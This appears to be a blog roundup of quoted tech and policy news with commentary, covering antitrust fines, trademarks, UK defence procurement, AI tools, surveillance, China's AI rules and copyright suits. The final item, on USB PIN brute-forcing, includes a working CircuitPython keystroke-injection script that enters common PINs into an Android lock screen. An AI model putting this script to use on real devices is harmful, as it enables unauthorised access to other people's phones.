Amazon also reduced the capacity of retailers in the European Union based outside Spain to access Spanish customers, and restricted the advertising Apple’s competitors were allowed to place on its website when users searched for Apple products, the regulator said.

Following the deal between the two tech giants, the prices of Apple devices sold online rose in Spain, it added.

[…]

Source: Spain antitrust watchdog fines Amazon, Apple $218 million | Reuters

Yay the power of a monopoly!

‘Taco Tuesday’ is no longer a trademarked phrase – wait, you can trademark a phrase like that?!

Taco Bell succeeded in its petition to remove the “Taco Tuesday” trademark held by Taco John’s, claiming it held an unfair monopoly over the phrase. Taco John’s CEO Jim Creel backed down from the fight on Tuesday, saying it isn’t worth the legal fees to retain the regional chain’s trademark.

“We’ve always prided ourselves on being the home of Taco Tuesday, but paying millions of dollars to lawyers to defend our mark just doesn’t feel like the right thing to do,” Taco John’s CEO Jim Creel said in a statement to CNN.

Taco John’s adopted the “Taco Tuesday” slogan back in the early 1980s as a two-for-one deal, labeling the promotion as “Taco Twosday” in an effort to ramp up sales. The company trademarked the term in 1989 and owned the right to the phrase in all states with the exception of New Jersey where Gregory’s Restaurant & Tavern beat out Taco John’s by trademarking the term in 1982.

Three decades later, Taco John’s finally received pushback when Taco Bell filed a petition with the U.S. Patent and Trademark Office in May to cancel the trademark, saying any restaurant should be able to use “Taco Tuesday.”

[…]

Source: ‘Taco Tuesday’ Has Been Liberated From Its Corporate Overlords

If you think about it, the ability to trademark two common words following each other doesn’t make sense at all really. In any two-word combination, there must have been prior common use.

UK buys 3 radar E-7 planes for 90% of the price of the original 5, creating a huge capability gap and showing how broken procurement is

The United Kingdom’s deal to buy three, rather than the previously planned five Boeing E-7A Wedgetail airborne early warning and control (AEW&C) aircraft for the Royal Air Force “represents extremely poor value for money” and “an absolute folly.” Those are among the conclusions of a report published today by the U.K. Defense Committee, a body that examines Ministry of Defense (MoD) expenditure, administration, and policy on behalf of the British parliament.

A computer-generated rendering of an E-7A Wedgetail in RAF service. Crown Copyright

At the center of the report’s criticism of the procurement is the fact that, as a result of a contract stipulation, the MoD is having to pay for all five Northrop Grumman Multi-role Electronically Scanned Array (MESA) radars, even though only three aircraft — which will be designated Wedgetail AEW1 in RAF service — are being acquired. The report assesses that the total cost of the three-aircraft order will be $2.5 billion, compared to the $2.7 billion agreed for five of the radar planes.

“Even basic arithmetic would suggest that ordering three E-7s rather than five (at some 90 [percent] of the original acquisition cost) represents extremely poor value for money,” the report contends.
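
Spelled out with the figures quoted above:

```python
# The committee's arithmetic on the E-7 deal.
old_total, old_jets = 2.7e9, 5
new_total, new_jets = 2.5e9, 3
print(f"cost ratio: {new_total / old_total:.0%}")                  # ~93%
print(f"per aircraft before: ${old_total / old_jets / 1e6:.0f}M")  # $540M
print(f"per aircraft now:    ${new_total / new_jets / 1e6:.0f}M")  # $833M
```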

The E-7 procurement is one of three major defense deals dealt with by the report, which comes at the end of a six-month inquiry. The Type 26 anti-submarine warfare frigate for the Royal Navy and the Ajax armored fighting vehicle for the British Army also come in for criticism. Worryingly, the overall conclusion is that the U.K.’s defense procurement system is “broken” and that “multiple, successive reviews have not yet fixed it.”

[…]

The report suggests that the tiny fleet will be a “prize target” for aggressors. Not only will the AEW&C aircraft play a critical role in any high-end air campaign, but also planes of this type are increasingly under threat from long-range air defenses and are far from survivable in any kind of contested airspace.

The same report also warns that the initial operating capability for the RAF E-7s could be delayed by a further year to 2025. This is especially concerning considering that the RAF retired its previous E-3D Sentry AEW1 radar planes in 2021, leaving a massive capability gap.

[…]

Other problems are dogging the U.K.’s plans to field the E-7, the report explains, including the failure of Boeing and the British procurement arm, Defense Equipment and Support (DE&S), to agree on an in-service support contract. The report says that such a contract “should already have been successfully finalized long ago.”

[…]

Source: UK’s E-7 Radar Jet Deal Slammed As “Absolute Folly” In New Report

So procurement can’t argue that although the savings in initial procurement are minimal, the savings on the through-life costs will be huge – because it has no idea what the through-life costs of the platform are!

Stability AI releases Stable Doodle, a sketch-to-image tool

Stability AI, the startup behind the image-generating model Stable Diffusion, is launching a new service that turns sketches into images.

The sketch-to-image service, Stable Doodle, leverages the latest Stable Diffusion model to analyze the outline of a sketch and generate a “visually pleasing” artistic rendition of it. It’s available starting today through ClipDrop, a platform Stability acquired in March through its purchase of Init ML, an AI startup founded by ex-Googlers.

[…]

Under the hood, powering Stable Doodle is a Stable Diffusion model — Stable Diffusion XL — paired with a “conditional control solution” developed by one of Tencent’s R&D divisions, the Applied Research Center (ARC). Called T2I-Adapter, the control solution both allows Stable Diffusion XL to accept sketches as input and guides the model to enable better fine-tuning of the output artwork.
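
Stable Doodle itself is a hosted service, but the same recipe — SDXL steered by Tencent ARC’s T2I-Adapter — is available in the open-source diffusers library. The sketch below is a hedged approximation using the public model releases; names and arguments may differ from what ClipDrop runs in production, and a CUDA GPU is assumed.

```python
# Sketch-to-image with SDXL + T2I-Adapter via diffusers (approximation).
import torch
from diffusers import StableDiffusionXLAdapterPipeline, T2IAdapter
from diffusers.utils import load_image

adapter = T2IAdapter.from_pretrained(
    "TencentARC/t2i-adapter-sketch-sdxl-1.0", torch_dtype=torch.float16
)
pipe = StableDiffusionXLAdapterPipeline.from_pretrained(
    "stabilityai/stable-diffusion-xl-base-1.0",
    adapter=adapter,
    torch_dtype=torch.float16,
).to("cuda")

sketch = load_image("doodle.png")  # your line drawing
image = pipe(
    prompt="a cozy cottage in a forest, watercolor",
    image=sketch,
    adapter_conditioning_scale=0.9,  # how strictly to follow the sketch
).images[0]
image.save("rendered.png")
```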

[…]

Source: Stability AI releases Stable Doodle, a sketch-to-image tool | TechCrunch

Find it at https://clipdrop.co/stable-doodle

Research group develops biodegradable film that keeps food fresh for longer

[…]

a film made of a compound derived from limonene, the main component of citrus fruit peel, and chitosan, a biopolymer derived from the chitin present in exoskeletons of crustaceans.

The film was developed by a research group in São Paulo state, Brazil, comprising scientists in the Department of Materials Engineering and Bioprocesses at the State University of Campinas’s School of Chemical Engineering (FEQ-UNICAMP) and the Packaging Technology Center at the Institute of Food Technology (ITAL) of the São Paulo State Department of Agriculture and Supply, also in Campinas.

The results of the research are reported in an article published in Food Packaging and Shelf Life.

[…]

Limonene has been used before in film for food to enhance conservation thanks to its antioxidant and anti-microbial action, but its performance is impaired by volatility and instability during the packaging manufacturing process, even on a laboratory scale.

[…]

“The films with the poly(limonene) additive outperformed those with limonene, especially in terms of antioxidant activity, which was about twice as potent,” Vieira said. The substance also performed satisfactorily as an ultraviolet radiation blocker and was found to be non-volatile, making it suitable for large-scale production of packaging, where processing conditions are more severe.

The films are not yet available for use by manufacturers, mainly because chitosan-based plastic is not yet produced on a sufficiently large scale to be competitive, but also because the poly(limonene) production process needs to be optimized to improve yield and to be tested during the manufacturing of commercial packaging.

[…]

More information: Sayeny de Ávila Gonçalves et al, Poly(limonene): A novel renewable oligomeric antioxidant and UV-light blocking additive for chitosan-based films, Food Packaging and Shelf Life (2023). DOI: 10.1016/j.fpsl.2023.101085

Source: Research group develops biodegradable film that keeps food fresh for longer

AI System Identified Drug Trafficker by Scanning Driving Patterns

Police in New York recently managed to identify and apprehend a drug trafficker seemingly by magic. The perp in question, David Zayas, was traveling through the small upstate town of Scarsdale when he was pulled over by Westchester County police. When cops searched Zayas’ vehicle they found a large amount of crack cocaine, a gun, and over $34,000 in cash in his vehicle. The arrestee later pleaded guilty to a drug trafficking charge.

How exactly did cops know Zayas fit the bill for drug trafficking?

Forbes reports that authorities used the services of a company called Rekor to analyze traffic patterns regionally and, in the course of that analysis, the program identified Zayas as suspicious.

For years, cops have used license plate reading systems to look out for drivers who might have an expired license or are wanted for prior violations. Now, however, AI integrations seem to be making the tech frighteningly good at identifying other kinds of criminality just by observing driver behavior.

Rekor describes itself as an AI-driven “roadway intelligence” platform and it contracts with police departments and other public agencies all across the country. It also works with private businesses. Using Rekor’s software, New York cops were able to sift through a gigantic database of information culled from regional roadways by its county-wide ALPR [automatic license plate recognition] system. That system—which Forbes says is made up of 480 cameras distributed throughout the region—routinely scans 16 million vehicles a week, capturing identifying data points like a vehicle’s license plate number, make, and model. By recording and reverse-engineering vehicle trajectories as they travel across the state, cops can apparently use software to assess whether particular routes are suspicious or not.

In this case, Rekor helped police to assess the route that Zayas’ car was taking on a multi-year basis. The algorithm—which found that the driver was routinely making trips back and forth between Massachusetts and certain areas of upstate New York—determined that Zayas’ routes were “known to be used by narcotics pushers and [involved]…conspicuously short stays,” Forbes writes. As a result, the program deemed Zayas’s activity consistent with that of a drug trafficker.
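
Rekor’s actual models are not public, so the following is only a sketch of the kind of trajectory scoring the article describes — repeated trips along flagged corridors with conspicuously short stays — with every name and threshold a hypothetical:

```python
# Illustrative route-suspicion scoring (hypothetical names and thresholds).
from dataclasses import dataclass

@dataclass
class Trip:
    corridor: str      # e.g. "MA -> upstate NY"
    stay_hours: float  # how long the vehicle stayed before heading back

FLAGGED_CORRIDORS = {"MA -> upstate NY"}  # hypothetical watch list

def suspicion_score(trips: list[Trip]) -> float:
    flagged = [t for t in trips if t.corridor in FLAGGED_CORRIDORS]
    if not flagged:
        return 0.0
    short_stays = sum(t.stay_hours < 2 for t in flagged) / len(flagged)
    frequency = min(len(flagged) / 20, 1.0)  # many repeats over the years
    return 0.5 * short_stays + 0.5 * frequency

# A high score flags a travel pattern, not a crime -- which is exactly
# why critics worry about treating it as grounds for a stop.
```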

Artificial intelligence has been getting a lot of attention in recent months due to the disruptions it’s made to the media and software industries but less attention has been paid to how this new technology will inevitably supercharge existing surveillance systems. If cops can already ID a drug trafficker with the click of a button, just think how good this tech will be in ten years’ time. As regulations evolve, one would hope governments will figure out how to reasonably deploy this technology without leading us right off the cliff into Minority Report territory. I mean, they probably won’t, but a guy can dream, can’t he?

Source: AI System Identified Drug Trafficker by Scanning Driving Patterns

There is no way at all that this could possibly go wrong, right? See the comments in the link.

China sets AI rules – not just risk based (EU AI Act), but also ideological

Chinese authorities published the nation’s rules governing generative AI on Thursday, including protections that aren’t in place elsewhere in the world.

Some of the rules require operators of generative AI to ensure their services “adhere to the core values of socialism” and don’t produce output that includes “incitement to subvert state power.” AIs are also required to avoid inciting secession, undermining national unity and social stability, or promoting terrorism.

Generative AI services behind the Great Firewall are also not to promote prohibited content that provokes ethnic hatred and discrimination, violence, obscenity, or “false and harmful information.” Those content-related rules don’t deviate from an April 2023 draft.

But deeper in, there’s a hint that China fancies digital public goods for generative AI. The doc calls for promotion of public training data resource platforms and collaborative sharing of model-making hardware to improve its utilization rates.

Authorities also want “orderly opening of public data classification, and [to] expand high-quality public training data resources.”

Another requirement is for AI to be developed with known secure tools: the doc calls for chips, software, tools, computing power and data resources to be proven quantities.

AI operators must also respect the intellectual property rights of data used in models, secure consent of individuals before including personal information, and work to “improve the quality of training data, and enhance the authenticity, accuracy, objectivity, and diversity of training data.”

As developers create algorithms, they’re required to ensure they don’t discriminate based on ethnicity, belief, country, region, gender, age, occupation, or health.

Operators are also required to secure licenses for their AIs under most circumstances.

AI deployed outside China has already run afoul of some of Beijing’s requirements. Just last week OpenAI was sued by novelists and comedians for training on their works without permission. Facial recognition tools used by the UK’s Metropolitan Police have displayed bias.

Hardly a week passes without one of China’s tech giants unveiling further AI services. Last week Alibaba announced a text-to-image service, and Huawei discussed a third-gen weather prediction AI.

The new rules come into force on August 15. Chinese orgs tempted to cut corners and/or flout the rules have the very recent example of Beijing’s massive fines imposed on Ant Group and Tencent as a reminder that straying from the rules will lead to pain – and possibly years of punishment.

Source: China sets AI rules that protect IP, people, and The Party • The Register

A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright

You may have seen some headlines recently about some authors filing lawsuits against OpenAI. The lawsuits (plural, though I’m confused why it’s separate attempts at filing a class action lawsuit, rather than a single one) began last week, when authors Paul Tremblay and Mona Awad sued OpenAI and various subsidiaries, claiming copyright infringement in how OpenAI trained its models. They got a lot more attention over the weekend when another class action lawsuit was filed against OpenAI with comedian Sarah Silverman as the lead plaintiff, along with Christopher Golden and Richard Kadrey. The same day the same three plaintiffs (though with Kadrey now listed as the top plaintiff) also sued Meta, though the complaint is basically the same.

All three cases were filed by Joseph Saveri, a plaintiffs class action lawyer who specializes in antitrust litigation. As with all too many class action lawyers, the goal is generally enriching the class action lawyers, rather than actually stopping any actual wrong. Saveri is not a copyright expert, and the lawsuits… show that. There are a ton of assumptions about how Saveri seems to think copyright law works, which is entirely inconsistent with how it actually works.

The complaints are basically all the same, and what it comes down to is the argument that AI systems were trained on copyright-covered material (duh) and that somehow violates their copyrights.

Much of the material in OpenAI’s training datasets, however, comes from copyrighted works—including books written by Plaintiffs—that were copied by OpenAI without consent, without credit, and without compensation

But… this is both wrong and not quite how copyright law works. Training an LLM does not require “copying” the work in question, but rather reading it. To some extent, this lawsuit is basically arguing that merely reading a copyright-covered work is, itself, copyright infringement.

Under this definition, all search engines would be copyright infringing, because effectively they’re doing the same thing: scanning web pages and learning from what they find to build an index. But we’ve already had courts say that’s not even remotely true. If the courts have decided that search engines scanning content on the web to build an index is clearly transformative fair use, so too would be scanning internet content for training an LLM. Arguably the latter case is way more transformative.

And this is the way it should be, because otherwise, it would basically be saying that anyone reading a work by someone else, and then being inspired to create something new would be infringing on the works they were inspired by. I recognize that the Blurred Lines case sorta went in the opposite direction when it came to music, but more recent decisions have really chipped away at Blurred Lines, and even the recording industry (the recording industry!) is arguing that the Blurred Lines case extended copyright too far.

But, if you look at the details of these lawsuits, they’re not arguing any actual copying (which, you know, is kind of important for there to be copyright infringement), but just that the LLMs have learned from the works of the authors who are suing. The evidence there is, well… extraordinarily weak.

For example, in the Tremblay case, they asked ChatGPT to “summarize” his book “The Cabin at the End of the World,” and ChatGPT does so. They do the same in the Silverman case, with her book “The Bedwetter.” If those are infringing, so is every book report by every schoolchild ever. That’s just not how copyright law works.

The lawsuit tries one other tactic here to argue infringement, beyond just “the LLMs read our books.” It also claims that the corpus of data used to train the LLMs was itself infringing.

For instance, in its June 2018 paper introducing GPT-1 (called “Improving Language Understanding by Generative Pre-Training”), OpenAI revealed that it trained GPT-1 on BookCorpus, a collection of “over 7,000 unique unpublished books from a variety of genres including Adventure, Fantasy, and Romance.” OpenAI confirmed why a dataset of books was so valuable: “Crucially, it contains long stretches of contiguous text, which allows the generative model to learn to condition on long-range information.” Hundreds of large language models have been trained on BookCorpus, including those made by OpenAI, Google, Amazon, and others.

BookCorpus, however, is a controversial dataset. It was assembled in 2015 by a team of AI researchers for the purpose of training language models. They copied the books from a website called Smashwords that hosts self-published novels, that are available to readers at no cost. Those novels, however, are largely under copyright. They were copied into the BookCorpus dataset without consent, credit, or compensation to the authors.

If that’s the case, then they could make the argument that BookCorpus itself is infringing on copyright (though, again, I’d argue there’s a very strong fair use claim under the Perfect 10 cases), but that’s separate from the question of whether or not training on that data is infringing.

And that’s also true of the other claims of secret pirated copies of books that the complaint insists OpenAI must have relied on:

As noted in Paragraph 32, supra, the OpenAI Books2 dataset can be estimated to contain about 294,000 titles. The only “internet-based books corpora” that have ever offered that much material are notorious “shadow library” websites like Library Genesis (aka LibGen), Z-Library (aka Bok), Sci-Hub, and Bibliotik. The books aggregated by these websites have also been available in bulk via torrent systems. These flagrantly illegal shadow libraries have long been of interest to the AI-training community: for instance, an AI training dataset published in December 2020 by EleutherAI called “Books3” includes a recreation of the Bibliotik collection and contains nearly 200,000 books. On information and belief, the OpenAI Books2 dataset includes books copied from these “shadow libraries,” because those are the most likely sources of trainable books most similar in nature and size to OpenAI’s description of Books2.

Again, think of the implications if this is copyright infringement. If a musician were inspired to create music in a certain genre after hearing pirated songs in that genre, would that make the songs they created infringing? No one thinks that makes sense except the most extreme copyright maximalists. But that’s not how the law actually works.

This entire line of cases is just based on a total and complete misunderstanding of copyright law. I completely understand that many creative folks are worried and scared about AI, and in particular that it was trained on their works, and can often (if imperfectly) create works inspired by them. But… that’s also how human creativity works.

Humans read, listen, watch, learn from, and are inspired by those who came before them. And then they synthesize that with other things, and create new works, often seeking to emulate the styles of those they learned from. AI systems and LLMs are doing the same thing. It’s not infringing to learn from and be inspired by the works of others. It’s not infringing to write a book report style summary of the works of others.

I understand the emotional appeal of these kinds of lawsuits, but the legal reality is that these cases seem doomed to fail, and possibly in a way that will leave the plaintiffs having to pay legal fees (since legal fee awards are much more common in copyright cases).

That said, if we’ve learned anything at all in the past two plus decades of lawsuits about copyright and the internet, courts will sometimes bend over backwards to rewrite copyright law to pretend it says what they want it to say, rather than what it does say. If that happens here, however, it would be a huge loss to human creativity.

Source: A Bunch Of Authors Sue OpenAI Claiming Copyright Infringement, Because They Don’t Understand Copyright | Techdirt

Brute Forcing A Mobile’s PIN Over USB With A $3 Board

Mobile PINs are a lot like passwords in that there are a number of very common ones, and [Mobile Hacker] has a clever proof of concept that uses a tiny microcontroller development board to emulate a keyboard to test the 20 most common unlock PINs on an Android device.

Trying the twenty most common PINs doesn’t take long.

The project is based on research analyzing the security of 4- and 6-digit smartphone PINs which found some striking similarities between user-chosen unlock codes. While the research is a few years old, user behavior in terms of PIN choice has probably not changed much.

The hardware is not much more than a Digispark board, a small ATtiny85-based board with built-in USB connector, and an adapter. In fact, it has a lot in common with the DIY Rubber Ducky except for being focused on doing a single job.

Once connected to a mobile device, it performs a form of keystroke injection attack, automatically sending keyboard events to input the most common PINs, with a delay between each attempt. Assuming the device accepts the input, trying all twenty codes takes about six minutes.
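
The project in the video runs an Arduino sketch on the Digispark; here is the same keystroke-injection idea expressed in CircuitPython for any board with native USB HID — an assumption on my part, not the author’s code. The long pause between attempts is what stretches the attack to about six minutes: Android enforces a lockout after a few wrong PINs.

```python
# Keystroke-injection PIN guesser (CircuitPython sketch, illustrative).
import time
import usb_hid
from adafruit_hid.keyboard import Keyboard
from adafruit_hid.keyboard_layout_us import KeyboardLayoutUS
from adafruit_hid.keycode import Keycode

# A few commonly chosen PINs (ordering varies by study); the research
# cited above lists the full top twenty.
COMMON_PINS = ["1234", "1111", "0000", "1212", "7777"]

kbd = Keyboard(usb_hid.devices)
layout = KeyboardLayoutUS(kbd)

for pin in COMMON_PINS:
    layout.write(pin)        # type the candidate PIN as keystrokes
    kbd.send(Keycode.ENTER)  # submit it
    time.sleep(30)           # wait out the lockout before the next try
```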

Disabling OTG connections for a device is one way to prevent this kind of attack, and not configuring a common PIN like ‘1111’ or ‘1234’ is even better. You can see the brute forcing in action in the video embedded in the source post.

Source: Brute Forcing A Mobile’s PIN Over USB With A $3 Board | Hackaday